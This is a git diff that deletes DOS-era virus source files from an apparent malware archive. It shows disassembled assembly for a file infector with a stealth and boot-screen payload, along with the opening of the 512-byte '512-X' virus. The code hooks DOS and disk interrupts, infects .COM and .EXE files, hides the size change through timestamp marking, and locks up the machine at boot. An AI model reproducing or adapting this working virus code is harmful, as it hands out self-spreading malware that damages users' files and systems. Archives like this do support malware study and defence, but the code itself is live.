- mov cl,1Ch - mov dx,4 - call sub_24 ; INT 21 - mov ax,4202h - xor cx,cx ; Zero register - mov dx,cx - call sub_24 ; INT 21 - mov data_80,ax ; (CS:12A9=0) - mov data_81,dx ; (CS:12AB=0) - mov di,ax - add ax,0Fh - adc dx,0 - and ax,0FFF0h - sub di,ax - mov cx,10h - div cx ; ax,dx rem=dx:ax/reg - mov si,ax - retn -sub_5 endp - - -; -; SUBROUTINE -; - -sub_6 proc near - mov ax,4200h - xor cx,cx ; Zero register - mov dx,cx - call sub_24 ; INT 21 - mov ah,40h - mov cl,1Ch - mov dx,1200h - call sub_24 ; INT 21 - mov ax,10h - mul si ; dx:ax = reg * ax - mov cx,dx - mov dx,ax - mov ax,4200h - call sub_24 ; INT 21 - xor dx,dx ; Zero register - mov cx,1000h - add cx,di - mov ah,40h - call sub_24 ; INT 21 - mov ax,5701h - mov cx,data_53 ; (CS:1229=0) - mov dx,data_54 ; (CS:122B=0) - test dh,80h - jnz loc_47 ; Jump if not zero - add dh,0C8h -loc_47: call sub_24 ; INT 21 - cmp byte ptr dos_ver,3 ; (CS:12EE=0) - jb loc_ret_48 ; Jump if below - cmp byte ptr data_103,0 ; (CS:12EF=0) - je loc_ret_48 ; Jump if equal - push bx - mov dl,data_52 ; (CS:1228=0) - mov ah,32h - call sub_24 ; INT 21 - mov ax,cs:data_101 ; (CS:12EC=0) - mov [bx+1Eh],ax - pop bx -loc_ret_48: - retn -sub_6 endp - - -; -; SUBROUTINE -; - -sub_7 proc near - call sub_21 ; Save REGS in vir's stack - mov di,dx - add di,0Dh - push ds - pop es - jmp short loc_50 ; (0945) -sub_7 endp - - -; -; SUBROUTINE -; - -sub_8 proc near - call sub_21 ; Save REGS in vir's stack - save REGS - push ds - pop es - mov di,dx - mov cx,50h - xor ax,ax ; Zero register - mov bl,0 - cmp byte ptr [di+1],3Ah ; ':' - jne loc_49 ; Jump if not equal - mov bl,[di] - and bl,1Fh -loc_49: - mov cs:data_52,bl ; (CS:1228=0) - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al -loc_50: - mov ax,[di-3] - and ax,0DFDFh - add ah,al - mov al,[di-4] - and al,0DFh - add al,ah - mov byte ptr cs:data_31,0 ; (CS:0020=0) - cmp al,0DFh ; file name is ....COM - je loc_51 ; Jump if equal - inc byte ptr cs:data_31 ; (CS:0020=0) - cmp al,0E2h ; file name is ....EXE - 
jne loc_52 ; Jump if not equal -loc_51: - call sub_20 ; Restore regs from vir's stack - clc ; Clear carry flag - retn -loc_52: - call sub_20 ; Restore regs from vir's stack - stc ; Set carry flag - retn -sub_8 endp - - -; -; SUBROUTINE -; - -sub_9 proc near - push bx - mov ah,51h - call sub_24 ; INT 21 - mov cs:data_77,bx ; (CS:12A3=0) - pop bx - retn -sub_9 endp - - -; -; SUBROUTINE -; - -sub_10 proc near - call sub_13 ; (0CC6) - push dx - mov dl,cs:data_52 ; (CS:1228=0) - mov ah,36h ; '6' - call sub_24 ; INT 21 - mul cx ; dx:ax = reg * ax - mul bx ; dx:ax = reg * ax - mov bx,dx - pop dx - or bx,bx ; Zero ? - jnz loc_53 ; Jump if not zero - cmp ax,4000h - jb loc_54 ; Jump if below -loc_53: - mov ax,4300h - call sub_24 ; INT 21 - jc loc_54 ; Jump if carry Set - mov di,cx - xor cx,cx ; Zero register - mov ax,4301h - call sub_24 ; INT 21 - cmp byte ptr cs:data_90,0 ; (CS:12DA=0) - jne loc_54 ; Jump if not equal - mov ax,3D02h - call sub_24 ; INT 21 - jc loc_54 ; Jump if carry Set - mov bx,ax - mov cx,di - mov ax,4301h - call sub_24 ; INT 21 - push bx - mov dl,cs:data_52 ; (CS:1228=0) - mov ah,32h ; '2' - call sub_24 ; INT 21 - mov ax,[bx+1Eh] - mov cs:data_101,ax ; (CS:12EC=0) - pop bx - call sub_14 ; (0D6C) - retn -loc_54: - xor bx,bx ; Zero register - dec bx - call sub_14 ; (0D6C) - retn -sub_10 endp - - -; -; SUBROUTINE -; - -sub_11 proc near - push cx - push dx - push ax - mov ax,4400h - call sub_24 ; INT 21 - xor dl,80h - test dl,80h - jz loc_55 ; Jump if zero - mov ax,5700h - call sub_24 ; INT 21 - test dh,80h -loc_55: - pop ax - pop dx - pop cx - retn -sub_11 endp - - -; -; SUBROUTINE -; - -sub_12 proc near - call sub_21 ; Save REGS in vir's stack - mov ax,4201h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - call sub_24 ; INT 21 - mov cs:data_78,ax ; (CS:12A5=0) - mov cs:data_79,dx ; (CS:12A7=0) - mov ax,4202h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - call sub_24 ; INT 21 - mov cs:data_80,ax ; (CS:12A9=0) - mov cs:data_81,dx ; 
(CS:12AB=0) - mov ax,4200h - mov dx,cs:data_78 ; (CS:12A5=0) - mov cx,cs:data_79 ; (CS:12A7=0) - call sub_24 ; INT 21 - call sub_20 ; Restore regs from vir's stack - retn -sub_12 endp - -_21_57: or al,al ; Zero ? - jnz loc_58 ; Jump if not zero - and cs:data_85,0FFFEh ; (CS:12B3=0) - call sub_19 ; Restore REGS - call sub_24 ; INT 21 - jc loc_57 ; Jump if carry Set - test dh,80h - jz loc_56 ; Jump if zero - sub dh,0C8h -loc_56: - jmp loc_11 ; (033F) -loc_57: - or cs:data_85,1 ; (CS:12B3=0) - jmp loc_11 ; (033F) -loc_58: - cmp al,1 - jne loc_61 ; Jump if not equal - and cs:data_85,0FFFEh ; (CS:12B3=0) - test dh,80h - jz loc_59 ; Jump if zero - sub dh,0C8h -loc_59: - call sub_11 ; (09E6) - jz loc_60 ; Jump if zero - add dh,0C8h -loc_60: - call sub_24 ; INT 21 - mov [bp-4],ax - adc cs:data_85,0 ; (CS:12B3=0) - jmp loc_13 ; (0396) -_21_42: cmp al,2 - jne loc_61 ; Jump if not equal - call sub_11 ; (09E6) - jz loc_61 ; Jump if zero - sub word ptr [bp-0Ah],1000h - sbb word ptr [bp-8],0 -loc_61: - jmp loc_10 ; (030F) -_21_3F: and byte ptr cs:data_85,0FEh ; (CS:12B3=0) - call sub_11 ; (09E6) - jz loc_61 ; Jump if zero - mov cs:data_83,cx ; (CS:12AF=0) - mov cs:data_82,dx ; (CS:12AD=0) - mov cs:data_84,0 ; (CS:12B1=0) - call sub_12 ; (0A04) - mov ax,cs:data_80 ; (CS:12A9=0) - mov dx,cs:data_81 ; (CS:12AB=0) - sub ax,1000h - sbb dx,0 - sub ax,cs:data_78 ; (CS:12A5=0) - sbb dx,cs:data_79 ; (CS:12A7=0) - jns loc_62 ; Jump if not sign - mov word ptr [bp-4],0 - jmp loc_25 ; (0549) -loc_62: - jnz loc_63 ; Jump if not zero - cmp ax,cx - ja loc_63 ; Jump if above - mov cs:data_83,ax ; (CS:12AF=0) -loc_63: - mov dx,cs:data_78 ; (CS:12A5=0) - mov cx,cs:data_79 ; (CS:12A7=0) - or cx,cx ; Zero ? - jnz loc_64 ; Jump if not zero - cmp dx,1Ch - jbe loc_65 ; Jump if below or = -loc_64: - mov dx,cs:data_82 ; (CS:12AD=0) - mov cx,cs:data_83 ; (CS:12AF=0) - mov ah,3Fh ; '?' 
- call sub_24 ; INT 21 - add ax,cs:data_84 ; (CS:12B1=0) - mov [bp-4],ax - jmp loc_13 ; (0396) -loc_65: - mov si,dx - mov di,dx - add di,cs:data_83 ; (CS:12AF=0) - cmp di,1Ch - jb loc_66 ; Jump if below - xor di,di ; Zero register - jmp short loc_67 ; (0B35) -loc_66: - sub di,1Ch - neg di -loc_67: - mov ax,dx - mov cx,cs:data_81 ; (CS:12AB=0) - mov dx,cs:data_80 ; (CS:12A9=0) - add dx,0Fh - adc cx,0 - and dx,0FFF0h - sub dx,0FFCh - sbb cx,0 - add dx,ax - adc cx,0 - mov ax,4200h - call sub_24 ; INT 21 - mov cx,1Ch - sub cx,di - sub cx,si - mov ah,3Fh ; '?' - mov dx,cs:data_82 ; (CS:12AD=0) - call sub_24 ; INT 21 - add cs:data_82,ax ; (CS:12AD=0) - sub cs:data_83,ax ; (CS:12AF=0) - add cs:data_84,ax ; (CS:12B1=0) - xor cx,cx ; Zero register - mov dx,1Ch - mov ax,4200h - call sub_24 ; INT 21 - jmp loc_64 ; (0B04) -_21_40: and byte ptr cs:data_85,0FEh ; (CS:12B3=0) - call sub_11 ; (09E6) - jnz loc_68 ; Jump if not zero - jmp loc_61 ; (0AA2) -loc_68: - mov cs:data_83,cx ; (CS:12AF=0) - mov cs:data_82,dx ; (CS:12AD=0) - mov cs:data_84,0 ; (CS:12B1=0) - call sub_12 ; (0A04) - mov ax,cs:data_80 ; (CS:12A9=0) - mov dx,cs:data_81 ; (CS:12AB=0) - sub ax,1000h - sbb dx,0 - sub ax,cs:data_78 ; (CS:12A5=0) - sbb dx,cs:data_79 ; (CS:12A7=0) - js loc_69 ; Jump if sign=1 - jmp short loc_71 ; (0C47) -loc_69: - call sub_13 ; (0CC6) - push cs - pop ds - mov dx,data_80 ; (CS:12A9=0) - mov cx,data_81 ; (CS:12AB=0) - add dx,0Fh - adc cx,0 - and dx,0FFF0h - sub dx,0FFCh - sbb cx,0 - mov ax,4200h - call sub_24 ; INT 21 - mov dx,4 - mov cx,1Ch - mov ah,3Fh ; '?' 
- call sub_24 ; INT 21 - mov ax,4200h - xor cx,cx ; Zero register - mov dx,cx - call sub_24 ; INT 21 - mov dx,4 - mov cx,1Ch - mov ah,40h ; '@' - call sub_24 ; INT 21 - mov dx,0F000h - mov cx,0FFFFh - mov ax,4202h - call sub_24 ; INT 21 - mov ah,40h ; '@' - xor cx,cx ; Zero register - call sub_24 ; INT 21 - mov dx,data_78 ; (CS:12A5=0) - mov cx,data_79 ; (CS:12A7=0) - mov ax,4200h - call sub_24 ; INT 21 - mov ax,5700h - call sub_24 ; INT 21 - test dh,80h - jz loc_70 ; Jump if zero - sub dh,0C8h - mov ax,5701h - call sub_24 ; INT 21 -loc_70: - call sub_14 ; (0D6C) - jmp loc_10 ; (030F) -loc_71: - jnz loc_72 ; Jump if not zero - cmp ax,cx - ja loc_72 ; Jump if above - jmp loc_69 ; (0BC9) -loc_72: - mov dx,cs:data_78 ; (CS:12A5=0) - mov cx,cs:data_79 ; (CS:12A7=0) - or cx,cx ; Zero ? - jnz loc_73 ; Jump if not zero - cmp dx,1Ch - ja loc_73 ; Jump if above - jmp loc_69 ; (0BC9) -loc_73: - call sub_19 ; Restore REGS - call sub_24 ; INT 21 - call sub_17 ; Save REGS - mov ax,5700h - call sub_24 ; INT 21 - test dh,80h - jnz loc_74 ; Jump if not zero - add dh,0C8h - mov ax,5701h - call sub_24 ; INT 21 -loc_74: jmp loc_13 ; (0396) - jmp loc_10 ; (030F) - -int_13: pop word ptr cs:data_65 ; (CS:1241=0) - pop word ptr cs:data_65+2 ; (CS:1243=0) - pop cs:data_91 ; (CS:12DB=0) - and cs:data_91,0FFFEh ; (CS:12DB=0) - cmp byte ptr cs:data_90,0 ; (CS:12DA=0) - jne loc_75 ; Jump if not equal - push cs:data_91 ; (CS:12DB=0) - call dword ptr cs:old_INT ; (CS:122D=0) - jnc loc_76 ; Jump if carry=0 - inc cs:data_90 ; (CS:12DA=0) -loc_75: stc ; Set carry flag -loc_76: jmp dword ptr cs:data_65 ; (CS:1241=0) - -int_24: xor al,al ; Zero register - mov byte ptr cs:data_90,1 ; (CS:12DA=0) - iret ; Interrupt return - -; -; SUBROUTINE -; - -sub_13 proc near - mov byte ptr cs:data_90,0 ; (CS:12DA=0) - call sub_21 ; Save REGS in vir's stack - push cs - pop ds - mov al,13h - call sub_1 ; Get INT 13 vector - mov word ptr old_INT,bx ; (CS:122D=0) - mov word ptr old_INT+2,es ; (CS:122F=70h) - mov word 
ptr old_INT_13,bx ; (CS:1239=0) - mov word ptr old_INT_13+2,es ; (CS:123B=70h) - mov dl,0 - mov al,0Dh - call sub_1 ; Get INT 0D vector - mov ax,es - cmp ax,0C000h - jae loc_77 ; Jump if above or = - mov dl,2 -loc_77: - mov al,0Eh - call sub_1 ; Get INT 0E vector - mov ax,es - cmp ax,0C000h - jae loc_78 ; Jump if above or = - mov dl,2 -loc_78: - mov data_73,dl ; (CS:1250=0) - call sub_22 ; Set INT 01 for debuging - mov data_92,ss ; (CS:12DD=151Ch) - mov data_93,sp ; (CS:12DF=0) - push cs - mov ax,offset loc_79 - push ax - mov ax,70h - mov es,ax - mov cx,0FFFFh - mov al,0CBh - xor di,di ; Zero register - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - dec di - pushf ; Push flags - push es - push di - pushf ; Push flags - pop ax - or ah,1 - push ax - in al,21h ; port 21h, 8259-1 int IMR - mov data_97,al ; (CS:12E5=0) - mov al,0FFh - out 21h,al ; port 21h, 8259-1 int comands - popf ; Pop flags - xor ax,ax ; Zero register - jmp dword ptr old_INT ; (CS:122D=0) -loc_79: - lds dx,old_INT_1 ; (CS:1231=0) Load 32 bit ptr - mov al,1 - call sub_27 ; Set INT 01 vector - push cs - pop ds - mov dx,offset int_13 - mov al,13h - call sub_27 ; Set INT 13 vector - mov al,24h - call sub_1 ; Get INT 24 vector - mov word ptr old_INT_24,bx ; (CS:123D=0) - mov word ptr old_INT_24+2,es ; (CS:123F=70h) - mov dx,offset int_24 - mov al,24h - call sub_27 ; Set INT 24 vector - call sub_20 ; Restore regs from vir's stack - retn -sub_13 endp - - -; -; SUBROUTINE -; - -sub_14 proc near - call sub_21 ; Save REGS in vir's stack - lds dx,dword ptr cs:old_INT_13 ; (CS:1239=0) Load 32 bit ptr - mov al,13h - call sub_27 ; Set INT 13 vector - lds dx,dword ptr cs:old_INT_24 ; (CS:123D=0) Load 32 bit ptr - mov al,24h - call sub_27 ; Set INT 24 vector - call sub_20 ; Restore regs from vir's stack - retn -sub_14 endp - - -; -; SUBROUTINE -; - -sub_15 proc near - mov ax,3300h ; Get CTRL-BREAK state - call sub_24 ; INT 21 - mov cs:data_94,dl ; (CS:12E1) save state - mov ax,3301h - xor dl,dl ; Set CTRL-BREAK 
= OFF - call sub_24 ; INT 21 - retn -sub_15 endp - - -; -; SUBROUTINE -; - -sub_16 proc near - mov dl,cs:data_94 ; (CS:12E1) - mov ax,3301h ; Restore CTRL-BREAK state - call sub_24 ; INT 21 - retn -sub_16 endp - - -; -; SUBROUTINE -; - -sub_17 proc near - pop cs:data_100 ; (CS:12EA=0) - pushf ; Push flags - push ax - push bx - push cx - push dx - push si - push di - push ds - push es - jmp word ptr cs:data_100 ; (CS:12EA=0) -sub_17 endp - - -; -; SUBROUTINE -; - -sub_18 proc near - les di,dword ptr cs:ptr_INT_21 ; (CS:1235=0) Load 32 bit ptr - mov si,offset data_70 ; (CS:124B=0) - push cs - pop ds - cld ; Clear direction - mov cx,5 - -locloop_80: - lodsb ; String [si] to al - xchg al,es:[di] - mov [si-1],al - inc di - loop locloop_80 ; Loop if cx > 0 - - retn -sub_18 endp - - -; -; SUBROUTINE -; - -sub_19 proc near - pop cs:data_100 ; (CS:12EA=0) - pop es - pop ds - pop di - pop si - pop dx - pop cx - pop bx - pop ax - popf ; Pop flags - jmp word ptr cs:data_100 ; (CS:12EA=0) - -; External Entry into Subroutine - -sub_20: - mov cs:data_114,offset sub_19 ; (CS:135D=0) Restore REGS - jmp short loc_81 ; (0DF6) - -; External Entry into Subroutine - -sub_21: - mov cs:data_114,offset sub_17 ; (CS:135D=0) Save REGS -loc_81: mov cs:data_112,ss ; (CS:1359=151Ch) - mov cs:data_111,sp ; (CS:1357=0) - push cs - pop ss - mov sp,cs:data_113 ; (CS:135B=0) - call word ptr cs:data_114 ; (CS:135D=0) - mov cs:data_113,sp ; (CS:135B=0) - mov ss,cs:data_112 ; (CS:1359=151Ch) - mov sp,cs:data_111 ; (CS:1357=0) - retn -sub_19 endp - - -; -; SUBROUTINE -; - -sub_22 proc near - mov al,1 - call sub_1 ; Get INT 01 vector - mov word ptr cs:old_INT_1,bx ; (CS:1231=0) - mov word ptr cs:old_INT_1+2,es ; (CS:1233=70h) - push cs - pop ds - mov dx,offset debug - call sub_27 ; Set INT 01 vector - retn -sub_22 endp - -_21_48: call sub_23 ; (0E3A) - jmp loc_10 ; (030F) - -; -; SUBROUTINE -; - -sub_23 proc near - cmp byte ptr cs:data_95,0 ; (CS:12E2=0) - je loc_ret_83 ; Jump if equal - cmp bx,0FFFFh - 
jne loc_ret_83 ; Jump if not equal - mov bx,160h - call sub_24 ; INT 21 - jc loc_ret_83 ; Jump if carry Set - mov dx,cs - cmp ax,dx - jb loc_82 ; Jump if below - mov es,ax - mov ah,49h - call sub_24 ; INT 21 - jmp short loc_ret_83 ; (0E8A) -loc_82: - dec dx - mov ds,dx - mov word ptr ds:MCB_0001,0 ; (7DBC:0001=275h) - inc dx - mov ds,dx - mov es,ax - push ax - mov cs:data_72,ax ; (CS:124E=7DBDh) - xor si,si ; Zero register - mov di,si - mov cx,all_len/2 - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - dec ax - mov es,ax - mov ax,cs:data_69 ; (CS:1249=0) - mov es:MCB_0001,ax ; (48FF:0001=0FFFFh) - mov ax,offset loc_ret_83 - push ax - retf -loc_ret_83: retn -sub_23 endp - -_21_37: mov byte ptr cs:data_104,2 ; (CS:12F0=0) - jmp loc_10 ; (030F) - -; -; SUBROUTINE -; - -sub_24 proc near ; calls INT 21 - pushf - call dword ptr cs:ptr_INT_21 ; (CS:1235=0) - retn -sub_24 endp - -boot: cli ; Disable interrupts - xor ax,ax ; Zero register - mov ss,ax - mov sp,7C00h - jmp short loc_85 ; (0EF4) - -data1 db 0dbh,0dbh,0dbh, 20h -data2 db 0f9h,0e0h,0e3h,0c3h - db 80h, 81h, 11h, 12h, 24h, 40h, 81h, 11h - db 12h, 24h, 40h,0F1h,0F1h, 12h, 24h, 40h - db 81h, 21h, 12h, 24h, 40h, 81h, 10h,0e3h - db 0C3h, 80h, 00h, 00h, 00h, 00h, 00h, 00h - db 00h, 00h, 00h, 00h, 82h, 44h,0F8h, 70h - db 0C0h, 82h, 44h, 80h, 88h,0C0h, 82h, 44h - db 80h, 80h,0C0h, 82h, 44h,0F0h, 70h,0C0h - db 82h, 28h, 80h, 08h,0C0h, 82h, 28h, 80h - db 88h, 00h,0F2h, 10h,0F8h, 70h,0C0h - -loc_85: push cs - pop ds - mov dx,0B000h - mov ah,0Fh - int 10h ; Video display ah=functn 0Fh - ; get state, al=mode, bh=page - cmp al,7 - je loc_86 ; Jump if equal - mov dx,0B800h -loc_86: - mov es,dx - cld ; Clear direction - xor di,di ; Zero register - mov cx,7D0h - mov ax,720h - rep stosw ; Rep when cx >0 Store ax to es:[di] - mov si,data2-boot+7C00h ; (CS:7C0E=0) - mov bx,2AEh -loc_87: - mov bp,5 - mov di,bx -loc_88: - lodsb ; String [si] to al - mov dh,al - mov cx,8 - -locloop_89: - mov ax,720h - shl dx,1 ; Shift w/zeros fill - 
jnc loc_90 ; Jump if carry=0 - mov al,0DBh -loc_90: - stosw ; Store ax to es:[di] - loop locloop_89 ; Loop if cx > 0 - - dec bp - jnz loc_88 ; Jump if not zero - add bx,0A0h - cmp si,loc_85-boot+7C00h - jb loc_87 ; Jump if below - mov ah,1 - int 10h ; Video display ah=functn 01h - ; set cursor mode in cx - mov al,8 - mov dx,loc_911-boot+7C00h - call sub_27 ; Set INT 08 vector - mov ax,7FEh - out 21h,al ; port 21h, 8259-1 int comands - ; al = 0FEh, IRQ0 (timer) only - sti ; Enable interrupts - xor bx,bx ; Zero register - mov cx,1 -loc_91: jmp short loc_91 ; SLEEP!!! -loc_911: dec cx ; INT 08 handler - jnz loc_92 ; Jump if not zero - xor di,di ; Zero register - inc bx - call sub_25 ; (0F67) - call sub_25 ; (0F67) - mov cl,4 -loc_92: - mov al,20h ; ' ' - out 20h,al ; port 20h, 8259-1 int command - ; al = 20h, end of interrupt - iret ; Interrupt return - -; -; SUBROUTINE -; - -sub_25 proc near - mov cx,28h - -locloop_93: - call sub_26 ; (0F93) - stosw ; Store ax to es:[di] - stosw ; Store ax to es:[di] - loop locloop_93 ; Loop if cx > 0 - -add1: add di,9Eh ; sub di,9Eh - mov cx,17h - -locloop_94: - call sub_26 ; (0F93) - stosw ; Store ax to es:[di] -add2: add di,9Eh ; sub di,9Eh - loop locloop_94 ; Loop if cx > 0 - -setd: std ; Set direction flag -_setd equ setd - boot + 7c00h - xor byte ptr ds:[_setd],1 ; (CS:7CE7=0) -_add1 equ add1 - boot + 7c01h - xor byte ptr ds:[_add1],28h ; (CS:7CD7=0) '(' -_add2 equ add2 - boot + 7c01h - xor byte ptr ds:[_add2],28h ; (CS:7CE2=0) '(' - retn -sub_25 endp - - -; -; SUBROUTINE -; - -sub_26 proc near - and bx,3 -_data1 equ data1 - boot + 7c00h - mov al,byte ptr ds:[_data1+bx] ; (CS:7C0A=0) - inc bx - retn -sub_26 endp - - -; -; SUBROUTINE -; - -sub_27 proc near - push es - push bx - xor bx,bx ; Zero register - mov es,bx - mov bl,al - shl bx,1 ; Shift w/zeros fill - shl bx,1 ; Shift w/zeros fill - mov es:[bx],dx - mov es:[bx+2],ds - pop bx - pop es - retn -sub_27 endp - - -; -; SUBROUTINE - *** DAMAGED BY STACK *** -; - -sub_28 proc 
near - call sub_13 ; (0CC6) - mov dl,1 - add [bp+si-4F2h],bl - pop es - jo $+2 ; Jump if overflow=1 - xor cx,word ptr ds:[32Eh] ; (0000:032E=0) - push di - sbb [bp+di],al - add byte ptr ds:[0],ah ; (0000:0000=5Bh) - add [bx+di],ah - add [bx+si+12h],dl - sbb dx,[bx] - loopnz $+11h ; Loop if zf=0, cx>0 - jnp $+23h ; Jump if not parity - db 0C1h, 02h, 31h, 41h, 7Ah, 16h - db 01h, 1Fh, 9Ah, 0Eh,0FBh, 07h - db 70h, 00h, 33h, 0Eh, 2Eh, 03h - db 57h, 18h, 57h, 1Fh,0A9h, 80h - db 00h, 00h, 57h, 1Fh -sub_28 endp - - org 1200h - -data_38 dw ? -data_40 dw ? -data_41 dw ?, ? -data_42 dw ? -data_43 dw ? -data_44 dw ? -data_45 dw ? -data_46 dw ?, ? -data_48 dw ? -data_49 dw ? - db 12 dup (?) -prm_blck_adr dw ?, ? -data_52 db ? -data_53 dw ? -data_54 dw ? -old_INT dd ? -old_INT_1 dd ? -ptr_INT_21 dd ? -old_INT_13 dd ? -old_INT_24 dd ? -data_65 dd ? -old_DS dw ? -data_68 dw ? -data_69 dw ? -data_70 db ? -data_71 dw ? -data_72 dw ? -data_73 db ? -data_74 db ? -data_75 db 50h dup (?) -data_76 db ? -data_77 dw ? -data_78 dw ? -data_79 dw ? -data_80 dw ? -data_81 dw ? -data_82 dw ? -data_83 dw ? -data_84 dw ? -data_85 dw ? -data_86 db 0Eh dup (?) -data_87 dw ? -data_88 dd ? - db ? -data_89 db 10h dup (?) -data_90 db ? -data_91 dw ? -data_92 dw ? -data_93 dw ? -data_94 db ? -data_95 db ? -old_AX dw ? -data_97 db ? -data_98 dw ? -data_99 dw ? -data_100 dw ? -data_101 dw ? -dos_ver db ? -data_103 db ? -data_104 db ? -exec_block db 0Eh dup (?) -data_106 dw ? -data_107 dw ? -entry_point dd ? -file_name db 50h dup (?) -data_111 dw ? -data_112 dw ? -data_113 dw ? -data_114 dw ? - -seg_a ends - - end - \ No newline at end of file diff --git a/0-9/512-X (11).ASM b/0-9/512-X (11).ASM deleted file mode 100755 index fbb9535..0000000 --- a/0-9/512-X (11).ASM +++ /dev/null 
@@ -1,304 +0,0 @@ -;NAME: 512-X.C-M -;FILE SIZE: 00200h - 512d -;START (CS:IP): 00100h -;CODE END: 00300h -;CODE ORIGIN: 00100h -;DATE: Wed Aug 05 13:56:29 1992 - -CODE SEGMENT BYTE PUBLIC 'CODE' -ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING - -P00100 PROC - ORG 0100h - -H00100: MOV AH,30h ;00100 B430 _0 - INT 21h ;2-DOS_Ver ;00102 CD21 _! - MOV SI,0004h ;00104 BE0400 ___ - MOV DS,SI ;DS_Chg ;00107 8EDE __ - CMP AH,1Eh ;00109 80FC1E ___ - LDS AX,[SI+08h] ;0010C C54408 _D_ - JB H0011B ;0010F 720A r_ - MOV AH,13h ;00111 B413 __ - INT 2Fh ;3-Prt_Splr_Ctrl ;00113 CD2F _/ - PUSH DS ;00115 1E _ - PUSH DX ;00116 52 R - INT 2Fh ;3-Prt_Splr_Ctrl ;00117 CD2F _/ - POP AX ;00119 58 X - POP DS ;0011A 1F _ -H0011B: MOV DI,00F8h ;0011B BFF800 ___ - STOSW ;0011E AB _ - MOV AX,DS ;0011F 8CD8 __ - STOSW ;00121 AB _ - MOV DS,SI ;DS_Chg ;00122 8EDE __ - LDS AX,[SI+40h] ;00124 C54440 _D@ - STOSW ;00127 AB _ - CMP AX,0121h ;00128 3D2101 =!_ - MOV AX,DS ;0012B 8CD8 __ - STOSW ;0012D AB _ - PUSH ES ;0012E 06 _ - PUSH DI ;0012F 57 W - JNZ H00139 ;00130 7507 u_ - SHL SI,1 ;00132 D1E6 __ - MOV CX,0100h ;00134 B90001 ___ - REPZ CMPSW ;00137 F3A7 __ -H00139: PUSH CS ;00139 0E _ - POP DS ;0013A 1F _ - JZ H00187 ;0013B 744A tJ - MOV AH,52h ;0013D B452 _R - INT 21h ;2-Rsvd_INT:21h-52h ;0013F CD21 _! 
- PUSH ES ;00141 06 _ - MOV SI,00F8h ;00142 BEF800 ___ - SUB DI,DI ;00145 2BFF +_ - LES AX,ES:[BX+12h] ;ES_Ovrd ;00147 26C44712 &_G_ - MOV DX,ES:[DI+02h] ;ES_Ovrd ;0014B 268B5502 &_U_ - MOV CX,0104h ;0014F B90401 ___ - REPZ MOVSW ;00152 F3A5 __ - MOV DS,CX ;DS_Chg ;00154 8ED9 __ - MOV DI,0016h ;00156 BF1600 ___ - MOV Word Ptr [DI+6Eh],0121h ;00159 C7456E2101 _En!_ - MOV [DI+70h],ES ;0015E 8C4570 _Ep - POP DS ;00161 1F _ - MOV [BX+14h],DX ;00162 895714 _W_ - MOV DX,CS ;00165 8CCA __ - MOV DS,DX ;DS_Chg ;00167 8EDA __ - MOV BX,[DI-14h] ;00169 8B5DEC _]_ - DEC BH ;0016C FECF __ - MOV ES,BX ;ES_Chg ;0016E 8EC3 __ - CMP DX,[DI] ;00170 3B15 ;_ - MOV DS,[DI] ;DS_Chg ;00172 8E1D __ - MOV DX,[DI] ;00174 8B15 __ - DEC DX ;00176 4A J - MOV DS,DX ;DS_Chg ;00177 8EDA __ - MOV SI,CX ;00179 8BF1 __ - MOV DX,DI ;0017B 8BD7 __ - MOV CL,28h ;0017D B128 _( - REPZ MOVSW ;0017F F3A5 __ - MOV DS,BX ;DS_Chg ;00181 8EDB __ - JB H00197 ;00183 7212 r_ - INT 20h ;B-TERM_norm:20h ;00185 CD20 _ -;--------------------------------------------------- -H00187: MOV SI,CX ;00187 8BF1 __ - MOV DS,[SI+2Ch] ;DS_Chg ;00189 8E5C2C _\, - LODSW ;0018C AD _ - DEC SI ;0018D 4E N - TEST AX,AX ;0018E 85C0 __ - JNZ H0018C ;00190 75FA u_ - ADD SI,+03h ;00192 83C603 ___ - MOV DX,SI ;00195 8BD6 __ -H00197: MOV AH,3Dh ;00197 B43D _= - CALL H001B0 ; . . . . . . . . . ;00199 E81400 ___ - MOV DX,[DI] ;0019C 8B15 __ - MOV [DI+04h],DX ;0019E 895504 _U_ - ADD [DI],CX ;001A1 010D __ - POP DX ;001A3 5A Z - PUSH DX ;001A4 52 R - PUSH CS ;001A5 0E _ - POP ES ;001A6 07 _ - PUSH CS ;001A7 0E _ - POP DS ;001A8 1F _ - PUSH DS ;001A9 1E _ - MOV AL,50h ;001AA B050 _P - PUSH AX ;001AC 50 P - MOV AH,3Fh ;001AD B43F _? - RET ;RET_Far ;001AF CB _ -;--------------------------------------------------- -H001B0: INT 21h ;Indef_INT:21h-AH ;001B0 CD21 _! 
- JB H001CD ;001B2 7219 r_ - MOV BX,AX ;001B4 8BD8 __ - PUSH BX ;001B6 53 S - MOV AX,1220h ;001B7 B82012 _ _ - INT 2Fh ;3-Prt_Splr_Ctrl ;001BA CD2F _/ - MOV BL,ES:[DI] ;ES_Ovrd ;001BC 268A1D &__ - MOV AX,1216h ;001BF B81612 ___ - INT 2Fh ;3-Prt_Splr_Ctrl ;001C2 CD2F _/ - POP BX ;001C4 5B [ - PUSH ES ;001C5 06 _ - POP DS ;001C6 1F _ - ADD DI,+11h ;001C7 83C711 ___ - MOV CX,0200h ;001CA B90002 ___ -H001CD: RET ;RET_Near ;001CD C3 _ -;--------------------------------------------------- - STI ;001CE FB _ - PUSH ES ;001CF 06 _ - PUSH SI ;001D0 56 V - PUSH DI ;001D1 57 W - PUSH BP ;001D2 55 U - PUSH DS ;001D3 1E _ - PUSH CX ;001D4 51 Q - CALL H001B6 ; . . . . . . . . . ;001D5 E8DEFF ___ - MOV BP,CX ;001D8 8BE9 __ - MOV SI,[DI+04h] ;001DA 8B7504 _u_ - POP CX ;001DD 59 Y - POP DS ;001DE 1F _ - CALL H00211 ; . . . . . . . . . ;001DF E82F00 _/_ - JB H0020A ;001E2 7226 r& - CMP SI,BP ;001E4 3BF5 ;_ - JNB H0020A ;001E6 7322 s" - PUSH AX ;001E8 50 P - MOV AL,ES:[DI-04h] ;ES_Ovrd ;001E9 268A45FC &_E_ - NOT AL ;001ED F6D0 __ - AND AL,1Fh ;001EF 241F $_ - JNZ H00209 ;001F1 7516 u_ - ADD SI,ES:[DI] ;ES_Ovrd ;001F3 260335 &_5 - XCHG SI,ES:[DI+04h] ;ES_Ovrd ;001F6 26877504 &_u_ - ADD ES:[DI],BP ;ES_Ovrd ;001FA 26012D &_- - CALL H00211 ; . . . . . 